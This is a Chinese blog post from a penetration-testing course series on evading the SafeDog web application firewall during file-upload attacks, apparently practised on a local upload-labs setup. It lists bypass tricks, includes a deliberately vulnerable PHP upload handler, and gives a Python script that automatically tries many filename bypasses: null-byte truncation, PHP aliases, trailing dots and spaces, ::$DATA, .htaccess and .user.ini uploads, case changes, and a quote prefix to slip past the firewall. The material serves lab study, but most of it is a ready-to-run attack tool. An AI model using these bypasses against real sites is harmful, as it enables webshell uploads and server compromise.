【小迪安全】Day24web漏洞-文件上传漏洞之WAF绕过

最新推荐文章于 2023-11-30 11:01:12 发布

楓椛

最新推荐文章于 2023-11-30 11:01:12 发布

阅读量384

点赞数

分类专栏：小迪安全渗透测试文章标签：安全 web安全 php

本文链接：https://blog.csdn.net/qq_44312640/article/details/127748396

版权

渗透测试同时被 2 个专栏收录

18 篇文章 0 订阅

订阅专栏

小迪安全

8 篇文章 1 订阅

订阅专栏

web漏洞-文件上传漏洞之WAF绕过

文章目录

web漏洞-文件上传漏洞之WAF绕过

前言

上篇文章【小迪安全】Day18-23web漏洞-文件上传介绍了文件上传漏洞基本类型，这次介绍文件上传漏洞的WAF绕过方法。

绕过安全狗

缓存溢出-加垃圾数据(经手动测试，此方法已经失效)

主要方法是在Content-Disposition参数后面加一堆垃圾数据测试安全狗能不能顶的住，经测试这个方法已经失效了。

符号变异

主要测试思路是用"截断文件名，看是否能绕过安全狗。

数据截断-防匹配(%00 ; 换行；/)(经手动测试，不行了，不排除fuzz测试时可以的可能性)

一个思路，只要不让安全狗匹配到.php即可。%00要求版本太低了，这边不测试了。

重复数据-参数多次(经测试，已经失效)

主要就是借用类似url参数污染的机制看能不能绕过安全狗的检查。

fuzz测试

测试思路和SQL注入绕过测试思路一致，先确定是什么原因导致的被拦截，再通过一些特殊的字符等绕过拦截原因。以upload-labs靶场的第6关举例，此关卡正常使用后缀名大小写即可绕过。测试一下加了安全狗后应该怎么绕过。

抓一下正常的数据包

判断拦截原因

测试了1.php、1.3php、1.php.png、1php.png四个名字，可以发现安全狗是匹配到.php字符串做的拦截。

fuzz爆破

经测试，upload-labs靶场使用爆破模块什么变量都有可能绕过去，但是实际repeater模块重新测试又不行了，可能是安全狗对upload-labs靶场做了动作，也可能是快速重复请求绕过去了？我模仿upload-labs的写了个脚本测试，主要去掉了页眉页脚,pass-xx等标识信息，结果是一致的，基本确定是连续请求绕过了安全狗的拦截，太暴力了，感觉没什么用。而在后缀名前面加特殊字符的方法，除了双引号和单引号，其它字符基本没用。

模仿写个脚本确定原因

<?php
include 'config.php';

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");
		$file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
        $file_ext = trim($file_ext); //首尾去空
		
		echo "此处打印_FILES['upload_file']['name']<br>";
		echo $_FILES['upload_file']['name'];

        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错！';
            }
        } else {
            $msg = '此文件类型不允许上传！';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建！';
    }
}
?>

<div id="upload_panel">
    <ol>
        <li>
            <h3>任务</h3>
            <p>上传一个<code>webshell</code>到服务器。</p>
        </li>
        <li>
            <h3>上传区</h3>
            <form enctype="multipart/form-data" method="post" onsubmit="return checkFile()">
                <p>请选择要上传的图片：<p>
                <input class="input_file" type="file" name="upload_file"/>
                <input class="button" type="submit" name="submit" value="上传"/>
            </form>
            <div id="msg">
                <?php 
                    if($msg != null){
                        echo "提示：".$msg;
                    }
                ?>
            </div>
            <div id="img">
                <?php
                    if($is_upload){
                        #echo '<img src="'.$img_path.'" width="250px" />';
						echo "上传成功啦";
                    }
                ?>
            </div>
        </li>
        <?php 
            if($_GET['action'] == "show_code"){
                include 'show_code.php';
            }
        ?>
    </ol>
</div>

使用字典

fuzz爆破当然也可以使用字典，使用方法这边就不演示了。字典可以在github上面找https://github.com/TheKingOfDuck/fuzzDicts之类的。

编写脚本

经过上述测试，我们使用双引号绕过的方法来编写脚本，基础脚本在上篇文章【小迪安全】Day18-23web漏洞-文件上传已经写好了，这里加个开关就好了。

import requests
from urllib3.fields import RequestField
from urllib3 import encode_multipart_formdata


# 是否绕过安全狗开关
pass_dog_flag = True
pass_str = ""
if pass_dog_flag:
  pass_str = "\""

# 挂个代理方便使用burp抓包分析
proxies = {'http': 'http://127.0.0.1:8888'}

pass_num_str = "09"
url = "http://localhost:8084/Pass-"+pass_num_str+"/index.php"

# boundary='---------------------------29377857821120'

def strSort(words):
    tempword = words
    for i in range(2**len(words)):
        int_bin = str(bin(i)).replace("0b","")
        for i in range(len(words)-len(int_bin)):
            int_bin = "".join(("0",int_bin))
        for index, i in enumerate(int_bin):
            if i=='1':
                wordslst = list(words)
                wordslst[index] = wordslst[index].upper()
                words = "".join(wordslst)
        yield words
        words = tempword

def getFiledList( mime, fileName, filePath):
  heards_upload_file = {
    "Content-Disposition": 'form-data; name="%s"; filename="%s"' % ("upload_file", fileName),
    "Content-Type": mime,
  }
  heards_submit = {
    "Content-Disposition": 'form-data; name="%s"' % ("submit"),
  }

  upload_file_field = RequestField("upload_file", open(filePath, 'rb').read(), None, heards_upload_file)
  submit_field = RequestField("submit", "上传", None, heards_submit)
  field_list = [upload_file_field, submit_field]
  return field_list

def getBodyAndHeader(mime="application/octet-stream", fileName="test.php", filePath="D:\\test.php"):

  field_list = getFiledList(mime=mime, fileName=pass_str+fileName, filePath=filePath)
  body, content_type = encode_multipart_formdata(field_list)
  
  header = {
    "Host":"localhost:8084",
    "User-Agent":"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0", 
    "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
    "Accept-Language":"zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
    "Accept-Encoding":"gzip, deflate",
    "Referer":"http://localhost:8084/Pass-03/index.php",
    "DNT":"1",
    "Connection":"close",
    "Upgrade-Insecure-Requests":"1",
    "Content-Type":content_type,
    # "Content-Type":"multipart/form-data; boundary="+m[1],
  }
  return body, header

def scan_orign():
  print("---开始检查原始的请求---")
  body,header = getBodyAndHeader()
  response = requests.post(url, data=body, proxies=proxies, headers=header)
  text = response.text
  if response.status_code==200:
    print("返回网页长度:%s" % (len(text)))
  else:
    print("请求出错!!!")

def scan_mime(allowMime="image/png"):
  print("---开始检查mime---")
  body,header = getBodyAndHeader(mime=allowMime)
  response = requests.post(url, data=body, proxies=proxies, headers=header)
  text = response.text
  if response.status_code==200:
    print("返回网页长度:%s" % (len(text)))
  else:
    print("请求出错!!!")

def scan_00():
  print("---开始扫描%00截断---")
  body,header = getBodyAndHeader(fileName="test"+pass_num_str+".php%00.png")
  response = requests.post(url, data=body, proxies=proxies, headers=header)
  text = response.text
  if response.status_code==200:
    print("返回网页长度:%s" % (len(text)))
  else:
    print("请求出错!!!")

def scan_php_other_name():
  print("---开始扫描php别名---")
  php_other_name_list = ["php3", "php5" , "phtml"]
  for item in php_other_name_list:
    body,header = getBodyAndHeader(fileName="test"+pass_num_str+"."+item)
    response = requests.post(url, data=body, proxies=proxies, headers=header)
    text = response.text
    if response.status_code==200:
      print("php别名%s返回网页长度:%s" % (item, len(text)))
    else:
      print("请求出错!!!")

def scan_point():
  print("---开始扫描点绕过---")
  point_list = [".", ". ", ". ."]
  for item in point_list:
    body,header = getBodyAndHeader(fileName="test"+pass_num_str+".php"+item)
    response = requests.post(url, data=body, proxies=proxies, headers=header)
    text = response.text
    if response.status_code==200:
      print("扫描点绕过"+item+"返回网页长度:%s" % (len(text)))
    else:
      print("请求出错!!!")

def scan_space():
  print("---开始扫描空格绕过---")
  body,header = getBodyAndHeader(fileName="test"+pass_num_str+".php ")
  response = requests.post(url, data=body, proxies=proxies, headers=header)
  text = response.text
  if response.status_code==200:
    print("返回网页长度:%s" % (len(text)))
  else:
    print("请求出错!!!")

def scan_data():
  print("---开始扫描$DATA绕过---")
  body,header = getBodyAndHeader(fileName="test"+pass_num_str+".php::$DATA")
  response = requests.post(url, data=body, proxies=proxies, headers=header)
  text = response.text
  if response.status_code==200:
    print("返回网页长度:%s" % (len(text)))
  else:
    print("请求出错!!!")

def scan_duble_suffix():
  print("---开始扫描双后缀名绕过---")
  body,header = getBodyAndHeader(fileName="test"+pass_num_str+".phpphp")
  response = requests.post(url, data=body, proxies=proxies, headers=header)
  text = response.text
  if response.status_code==200:
    print("返回网页长度:%s" % (len(text)))
  else:
    print("请求出错!!!")
  
def scan_htaccess():
  print("---开始扫描htaccess绕过---")
  body,header = getBodyAndHeader(fileName=".htaccess", filePath="D:\\.htaccess")
  response = requests.post(url, data=body, proxies=proxies, headers=header)
  text = response.text
  if response.status_code==200:
    print("返回网页长度:%s" % (len(text)))
  else:
    print("请求出错!!!")

def scan_userini():
  print("---开始扫描.user.ini绕过---")
  body,header = getBodyAndHeader(fileName=".user.ini", filePath="D:\\.user.ini")
  response = requests.post(url, data=body, proxies=proxies, headers=header)
  text = response.text
  if response.status_code==200:
    print("返回网页长度:%s" % (len(text)))
  else:
    print("请求出错!!!")

def scan_suffix_case():
  print("---开始扫描后缀大小写绕过---")
  for item in strSort("php"):
    body,header = getBodyAndHeader(fileName="test"+pass_num_str+"."+item)
    response = requests.post(url, data=body, proxies=proxies, headers=header)
    text = response.text
    if response.status_code==200:
      print("扫描后缀大小写%s网页长度:%s" % (item, len(text)))
    else:
      print("请求出错!!!")


def scan_all(url):
  scan_orign()
  scan_mime()
  scan_00()
  scan_php_other_name()
  scan_point()
  scan_space()
  scan_data()
  scan_duble_suffix()
  scan_htaccess()
  scan_userini()
  scan_suffix_case()

def run(url):
  scan_all(url)

if __name__ == '__main__':
    run(url)